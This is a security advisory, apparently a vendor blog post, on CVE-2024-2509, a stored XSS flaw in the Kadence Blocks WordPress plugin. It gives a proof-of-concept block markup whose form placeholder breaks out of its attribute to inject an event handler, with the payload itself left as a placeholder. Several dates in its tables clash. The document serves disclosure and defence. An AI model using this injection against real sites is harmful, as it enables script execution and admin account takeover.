A critical vulnerability, CVE-2024-2509, has been uncovered in the popular Gutenberg Blocks by Kadence Blocks plugin, boasting over 400,000 active installations. This flaw opens the door to malicious attackers, allowing them to execute Stored XSS attacks and potentially create admin accounts, posing a significant threat to WordPress sites.
Main info:
| CVE | CVE-2024-2509 |
| Plugin | Gutenberg Blocks by Kadence Blocks < 3.2.26 |
| Critical | Very High |
| All Time | 17 018 808 |
| Active installations | 400 000+ |
| Publicly Published | March 15, 2023 |
| Last Updated | March 15, 2023 |
| Researcher | Dmtirii Ignatyev |
| OWASP TOP-10 | A7: Cross-Site Scripting (XSS) |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2509 https://wpscan.com/vulnerability/dec4a632-e04b-4fdd-86e4-48304b892a4f/ |
| Plugin Security Certification by CleanTalk |  |
Timeline
| March 6, 2023 | Plugin testing and vulnerability detection in the Gutenberg Blocks by Kadence Blocks have been completed |
| March 6, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| March 15, 2024 | Registered CVE-2024-2509 |
Discovery of the Vulnerability
During routine testing, security researchers identified a flaw within the Gutenberg Blocks by Kadence Blocks plugin that enables contributors to inject malicious code via stored XSS, ultimately leading to the unauthorized creation of admin accounts.
Understanding of Stored XSS attack’s
Stored XSS vulnerabilities involve injecting malicious scripts into a web application, which are then stored and executed whenever the compromised page is accessed. In WordPress, this can occur through various entry points, such as form inputs, widgets, or post content.
Exploiting the Stored XSS Vulnerability
Exploiting CVE-2024-2509 involves crafting a post containing malicious content using the Gutenberg Blocks by Kadence Blocks plugin. By inserting carefully crafted code snippets, attackers can execute arbitrary scripts within the context of the site, potentially gaining administrative privileges.
POC:
<!-- wp:kadence/advanced-form -->\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"538_353543-f6\",\"colLayout\":\"equal\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"538_9c17ee-78\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column538_9c17ee-78\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/advanced-form-text {\"uniqueID\":\"9c5eb1-eb\",\"formID\":\"539\",\"label\":\"Name\",\"placeholder\":\"123\\u0022onmouseover='MALICIOUS_FUNCTION_HERE'\"} /--></div></div>\n<!-- /wp:kadence/column -->\n\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"538_b30f2d-7e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column538_b30f2d-7e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/advanced-form-email {\"uniqueID\":\"24e500-60\",\"formID\":\"539\",\"label\":\"Email\",\"required\":true} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<!-- wp:kadence/advanced-form-textarea {\"uniqueID\":\"3579ce-60\",\"formID\":\"539\",\"label\":\"Message\",\"required\":true} /-->\n\n<!-- wp:kadence/advanced-form-submit {\"uniqueID\":\"44ddad-75\",\"text\":\"Submit\"} /-->\n<!-- /wp:kadence/advanced-form -->___
The presence of a Stored XSS vulnerability in a widely used plugin like Gutenberg Blocks poses significant risks. Attackers can leverage this vulnerability to execute various malicious activities, including spreading malware, defacing websites, or stealing sensitive data.
Recommendations for Improved Security
To mitigate the risk associated with CVE-2024-2509, users should promptly update the Gutenberg Blocks by Kadence Blocks plugin to the latest version, where the vulnerability has been patched. Additionally, website administrators should regularly monitor for security updates and conduct thorough security audits to identify and address any potential vulnerabilities in their WordPress ecosystem.
By taking proactive measures to address Stored XSS vulnerabilities like CVE-2024-2509, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #StoredXSS #WebsiteSafety #StayProtected #VeryHighVulnerability
Use CleanTalk solutions to improve the security of your website
DMITRII I.
